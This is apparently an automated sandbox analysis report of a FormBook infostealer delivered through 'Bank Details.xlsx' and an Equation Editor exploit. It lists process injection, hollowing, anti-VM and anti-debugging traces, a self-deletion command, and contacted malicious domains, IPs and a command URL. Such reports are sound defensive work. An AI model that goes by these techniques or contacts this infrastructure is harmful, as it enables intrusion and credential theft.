Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/28@12/9
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404201 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 4_2_00404201
Source: C:\Users\Public\vbc.exe Code function: 4_2_004020A6 CoCreateInstance,MultiByteToWideChar, 4_2_004020A6
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Bank Details.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREA8D.tmp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: Bank Details.xlsx Static file information: File size 2370560 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, help.exe
Source: Binary string: help.pdb source: vbc.exe, 00000005.00000002.2218410009.0000000000579000.00000004.00000020.sdmp
Source: Bank Details.xlsx Initial sample: OLE indicators vbamacros = False
Source: Bank Details.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\Public\vbc.exe Unpacked PE file: 5.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode, 4_2_00401FDC
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 5_2_00416090 push edi; ret 5_2_004160A1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00407101 push cs; iretd 5_2_0040710A
Source: C:\Users\Public\vbc.exe Code function: 5_2_00416104 push ds; retf 5_2_00416105
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CA5A pushfd ; retf 5_2_0041CA5B
Source: C:\Users\Public\vbc.exe Code function: 5_2_004162ED push es; iretd 5_2_004162EF
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B3C5 push eax; ret 5_2_0041B418
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B47C push eax; ret 5_2_0041B482
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B412 push eax; ret 5_2_0041B418
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B41B push eax; ret 5_2_0041B482
Source: C:\Users\Public\vbc.exe Code function: 5_2_00415EC4 push edx; ret 5_2_00415EC5
Source: C:\Users\Public\vbc.exe Code function: 5_2_00415FA8 push esp; iretd 5_2_00415FA9
Source: C:\Users\Public\vbc.exe Code function: 5_2_0095DFA1 push ecx; ret 5_2_0095DFB4
Source: C:\Users\Public\vbc.exe Code function: 5_1_00416090 push edi; ret 5_1_004160A1
Source: C:\Users\Public\vbc.exe Code function: 5_1_00407101 push cs; iretd 5_1_0040710A
Source: C:\Users\Public\vbc.exe Code function: 5_1_00416104 push ds; retf 5_1_00416105
Source: C:\Users\Public\vbc.exe Code function: 5_1_004162ED push es; iretd 5_1_004162EF
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041B3C5 push eax; ret 5_1_0041B418
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041B47C push eax; ret 5_1_0041B482
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041B412 push eax; ret 5_1_0041B418
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041B41B push eax; ret 5_1_0041B482
Source: C:\Users\Public\vbc.exe Code function: 5_1_0041CA5A pushfd ; retf 5_1_0041CA5B
Source: C:\Users\Public\vbc.exe Code function: 5_1_00415EC4 push edx; ret 5_1_00415EC5
Source: C:\Users\Public\vbc.exe Code function: 5_1_00415FA8 push esp; iretd 5_1_00415FA9
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B3DFA1 push ecx; ret 7_2_00B3DFB4
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00096090 push edi; ret 7_2_000960A1
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00087101 push cs; iretd 7_2_0008710A
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00096104 push ds; retf 7_2_00096105
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_000962ED push es; iretd 7_2_000962EF
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0009B3C5 push eax; ret 7_2_0009B418
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0009B41B push eax; ret 7_2_0009B482
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0009B412 push eax; ret 7_2_0009B418

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dll Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: Bank Details.xlsx Stream path 'EncryptedPackage' entropy: 7.99971479672 (max. 8.0)

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 00000000000885F4 second address: 00000000000885FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088C0 rdtsc 5_2_004088C0
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2552 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 2884 Thread sleep time: -40000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 260 Thread sleep time: -32000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA, 4_2_0040531D
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose, 4_2_00405CB0
Source: C:\Users\Public\vbc.exe Code function: 4_2_004026BC FindFirstFileA, 4_2_004026BC
Source: explorer.exe, 00000006.00000000.2191462964.0000000004234000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000002.2373354532.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2191497413.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: explorer.exe, 00000006.00000000.2191450575.0000000004226000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD01dRom0
Source: explorer.exe, 00000006.00000000.2191450575.0000000004226000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD01
Source: explorer.exe, 00000006.00000000.2191462964.0000000004234000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.2184668586.00000000004D4000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000006.00000000.2191462964.0000000004234000.00000004.00000001.sdmp Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
Source: explorer.exe, 00000006.00000002.2373391560.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088C0 rdtsc 5_2_004088C0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409B30 LdrLoadDll, 5_2_00409B30
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\Public\vbc.exe Code function: 4_2_72341000 YVfgfgfgfgfg,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile, 4_2_72341000
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode, 4_2_00401FDC
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_02E21667 mov eax, dword ptr fs:[00000030h] 4_2_02E21667
Source: C:\Users\Public\vbc.exe Code function: 4_2_02E2187F mov eax, dword ptr fs:[00000030h] 4_2_02E2187F
Source: C:\Users\Public\vbc.exe Code function: 5_2_00940080 mov ecx, dword ptr fs:[00000030h] 5_2_00940080
Source: C:\Users\Public\vbc.exe Code function: 5_2_009400EA mov eax, dword ptr fs:[00000030h] 5_2_009400EA
Source: C:\Users\Public\vbc.exe Code function: 5_2_009626F8 mov eax, dword ptr fs:[00000030h] 5_2_009626F8
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00B426F8 mov eax, dword ptr fs:[00000030h] 7_2_00B426F8
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.thunderoffroadresort.com
Source: C:\Windows\explorer.exe Domain query: www.18598853855.com
Source: C:\Windows\explorer.exe Domain query: www.stone-master.info
Source: C:\Windows\explorer.exe Network Connect: 144.76.242.196 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.qcmax.com
Source: C:\Windows\explorer.exe Domain query: www.thesixteenthround.net
Source: C:\Windows\explorer.exe Domain query: www.christlicheliebe.net
Source: C:\Windows\explorer.exe Network Connect: 104.128.125.95 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 18.166.77.19 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.hostvngiare.com
Source: C:\Windows\explorer.exe Domain query: www.starr2021.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.playfulpainters.com
Source: C:\Windows\explorer.exe Network Connect: 3.230.51.235 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.212 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 104.21.71.76 80 Jump to behavior
Contains functionality to prevent local Windows debugging
Source: C:\Users\Public\vbc.exe Code function: 4_2_72341000 YVfgfgfgfgfg,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile, 4_2_72341000
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388 Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 1388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: B00000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: explorer.exe, 00000006.00000002.2373565413.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000002.2373565413.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.2373354532.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.2373565413.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 385368 Sample: Bank Details.xlsx Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 49 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 8 other signatures 2->55 10 EQNEDT32.EXE 16 2->10         started        15 EXCEL.EXE 174 49 2->15         started        process3 dnsIp4 45 stdypmrimelimtewsosq.dns.army 103.141.138.117, 49170, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->45 47 fqe.short.gy 52.59.165.42, 443, 49167 AMAZON-02US United States 10->47 35 C:\Users\user\AppData\Local\...\winlog[1].exe, PE32 10->35 dropped 37 C:\Users\Public\vbc.exe, PE32 10->37 dropped 75 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->75 17 vbc.exe 18 10->17         started        file5 signatures6 process7 file8 33 C:\Users\user\AppData\Local\...\e4utfxiuc.dll, PE32 17->33 dropped 57 Multi AV Scanner detection for dropped file 17->57 59 Detected unpacking (changes PE section rights) 17->59 61 Maps a DLL or memory area into another process 17->61 63 2 other signatures 17->63 21 vbc.exe 17->21         started        signatures9 process10 signatures11 65 Modifies the context of a thread in another process (thread injection) 21->65 67 Maps a DLL or memory area into another process 21->67 69 Sample uses process hollowing technique 21->69 71 Queues an APC in another process (thread injection) 21->71 24 explorer.exe 21->24 injected process12 dnsIp13 39 www.christlicheliebe.net 144.76.242.196, 49175, 80 HETZNER-ASDE Germany 24->39 41 www.qcmax.com 104.128.125.95, 49174, 80 HENGTONG-IDC-LLCUS United States 24->41 43 12 other IPs or domains 24->43 73 System process connects to network (likely due to code injection or exploit) 24->73 28 help.exe 24->28         started        signatures14 process15 signatures16 77 Modifies the context of a thread in another process (thread injection) 28->77 79 Maps a DLL or memory area into another process 28->79 81 Tries to detect virtualization through RDTSC time measurements 28->81 31 cmd.exe 28->31         started        process17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.128.125.95
www.qcmax.com United States
26658 HENGTONG-IDC-LLCUS true
18.166.77.19
dns.95h5cdn.com United States
16509 AMAZON-02US true
52.59.165.42
fqe.short.gy United States
16509 AMAZON-02US false
34.102.136.180
playfulpainters.com United States
15169 GOOGLEUS false
3.230.51.235
gp-usea-elb-13pj8i7f0fbsh-1771787045.us-east-1.elb.amazonaws.com United States
14618 AMAZON-AESUS false
103.141.138.117
stdypmrimelimtewsosq.dns.army Viet Nam
135905 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN true
198.54.117.212
parkingpage.namecheap.com United States
22612 NAMECHEAP-NETUS false
144.76.242.196
www.christlicheliebe.net Germany
24940 HETZNER-ASDE true
104.21.71.76
www.hostvngiare.com United States
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
www.hostvngiare.com 104.21.71.76 true
stdypmrimelimtewsosq.dns.army 103.141.138.117 true
dns.95h5cdn.com 18.166.77.19 true
gp-usea-elb-13pj8i7f0fbsh-1771787045.us-east-1.elb.amazonaws.com 3.230.51.235 true
parkingpage.namecheap.com 198.54.117.212 true
playfulpainters.com 34.102.136.180 true
www.qcmax.com 104.128.125.95 true
fqe.short.gy 52.59.165.42 true
www.christlicheliebe.net 144.76.242.196 true
www.thunderoffroadresort.com unknown unknown
www.18598853855.com unknown unknown
www.starr2021.com unknown unknown
www.stone-master.info unknown unknown
www.playfulpainters.com unknown unknown
www.thesixteenthround.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.starr2021.com/aqu2/?NP=FDSTiZqS/7wu56xr5ud1XtYEDVJDcY6JSxG6s2Z614q4ZNLNR7otPveqGH1j6obhpY7v2w==&Yzrt=nN6d4T true
  • Avira URL Cloud: safe
unknown